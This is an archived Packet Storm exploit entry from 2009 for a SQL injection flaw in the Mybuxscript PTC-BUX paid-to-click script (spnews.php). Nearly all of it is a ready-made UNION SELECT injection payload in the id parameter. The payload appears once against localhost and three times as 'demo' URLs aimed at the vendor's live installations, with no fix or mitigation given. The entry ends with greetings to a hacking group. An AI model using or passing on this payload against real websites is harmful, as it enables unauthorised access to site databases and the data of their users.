Mybuxscript PTC-BUX SQL Injection

2009-09-01T00:00:00
ID PACKETSTORM:80847
Type packetstorm
Reporter HxH
Modified 2009-09-01T00:00:00

Description

                                        
------------------------------------------------------------  
  
Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability  
  
------------------------------------------------------------  
  
Author.: HxH  
  
Contact: HxH[at]live[dot]at  
  
---------------------------  
  
Script.: Mybuxscript PTC-BUX (BASIC/ADVANCE/PRO)  
  
Home...: http://www.mybuxscript.com/index.php?cPath=1  
  
-----------------------------------------------------  
  
Exploit:  
  
[~] http://localhost/Path/?p=spnews&id=-7+UNION+SELECT+1,version(),3,4--  
  
------------------------------------------------------------------------  
  
Demo...:   
  
A: http://mybuxscript.com/salescripts/ptc_basic/?p=spnews&id=-7+UNION+SELECT+1,version(),3,4--  
  
B: http://mybuxscript.com/salescripts/ptc_advance/?p=spnews&id=-10+UNION+SELECT+1,version(),3,4--  
  
C: http://mybuxscript.com/salescripts/ptc_professional/?p=spnews&id=-12+UNION+SELECT+1,version(),3,4--  
  
------------------------------------------------------------------------------------------------------  
  
Greetz.: ~ JiKo ~ The Sad Hacker ~ All No-Exploit.com Members  
  
-------------------------------------------------------------  
  
  